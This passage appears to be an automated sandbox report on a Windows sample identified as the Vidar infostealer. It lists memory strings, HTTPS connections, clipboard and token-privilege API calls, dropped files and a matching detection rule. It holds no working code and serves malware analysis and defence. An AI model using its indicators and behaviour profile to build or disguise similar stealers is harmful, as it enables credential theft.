                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Aj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Bh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ih
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Lh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Sh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Uj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Vh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/be
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/dj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/jh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/nj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/qh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/th
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/vj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~h
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2590411022.000047E401A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2590362466.000047E401A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2590386370.000047E401A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: msedge.exe, 00000014.00000002.2777235184.00005B8002594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 00000011.00000002.2640056642.000047E400630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: Wb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                Source: chrome.exe, 00000011.00000003.2589876235.000047E401994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000011.00000003.2589876235.000047E401994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000011.00000002.2635064736.0000350800238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard5
                Source: chrome.exe, 00000011.00000003.2589876235.000047E401994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardG
                Source: chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 00000011.00000002.2636650790.0000350800780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000002.2639050533.000047E400468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 00000011.00000003.2550358346.00003508006FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
                Source: chrome.exe, 00000011.00000002.2636623453.0000350800754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensgoogle.com/v3/upload
                Source: chrome.exe, 00000011.00000003.2552340537.000047E4001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                Source: chrome.exe, 00000011.00000002.2639050533.000047E400468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638868900.000047E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: msedge.exe, 00000014.00000002.2777235184.00005B8002594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000014.00000002.2777235184.00005B8002594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                Source: chrome.exe, 00000011.00000002.2644178608.000047E400F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640691773.000047E4007A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                Source: chrome.exe, 00000011.00000002.2644178608.000047E400F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyG
                Source: chrome.exe, 00000011.00000002.2643588930.000047E400E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 00000011.00000002.2643588930.000047E400E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                Source: chrome.exe, 00000011.00000003.2561579862.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641806972.000047E400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: 2cc80dabc69f58b6_0.22.dr, 000003.log3.22.drString found in binary or memory: https://ntp.msn.com
                Source: 2cc80dabc69f58b6_0.22.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                Source: msedge.exe, 00000014.00000002.2777235184.00005B8002594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000011.00000002.2637677215.000047E4000FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.goog
                Source: chrome.exe, 00000011.00000002.2642024422.000047E400B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2644373735.000047E4010B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49752 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49757 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49759 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49798 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49932 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50046 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50120 version: TLS 1.2
                Source: C:\Users\user\Desktop\ChoForgot.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_0102F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_0102F7C7
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_0102F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_0102F55C
                Source: C:\Users\user\Desktop\ChoForgot.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_01049FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_01049FD2

                System Summary

                Source: 12.2.Wb.com.3d0000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_00FCFFE0 CloseHandle,NtProtectVirtualMemory,12_2_00FCFFE0
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_01024763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_01024763
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_01011B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_01011B4D
                Source: C:\Users\user\Desktop\ChoForgot.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_0101F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_0101F20D
                Source: C:\Users\user\Desktop\ChoForgot.exe File created: C:\Windows\CommercialGm
                Source: C:\Users\user\Desktop\ChoForgot.exe File created: C:\Windows\AirMotors
                Source: C:\Users\user\Desktop\ChoForgot.exe File created: C:\Windows\PanScout
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\623615\Wb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: String function: 00FD0DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: String function: 00FCFD52 appears 40 times
                Source: C:\Users\user\Desktop\ChoForgot.exe Code function: String function: 004062CF appears 58 times
                Source: ChoForgot.exe Static PE information: invalid certificate
                Source: ChoForgot.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.Wb.com.3d0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@95/287@27/16
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_010241FA GetLastError,FormatMessageW,12_2_010241FA
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_01012010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_01012010
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_01011A0B AdjustTokenPrivileges,CloseHandle,12_2_01011A0B
                Source: C:\Users\user\Desktop\ChoForgot.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_0101DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_0101DD87
                Source: C:\Users\user\Desktop\ChoForgot.exe Code function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_01023A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_01023A0E
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\VSGN8PPO.htm
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
                Source: C:\Users\user\Desktop\ChoForgot.exe File created: C:\Users\user\AppData\Local\Temp\nsbF2CF.tmp
                Source: ChoForgot.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\ChoForgot.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\ChoForgot.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: chrome.exe, 00000011.00000002.2640091594.000047E400655000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
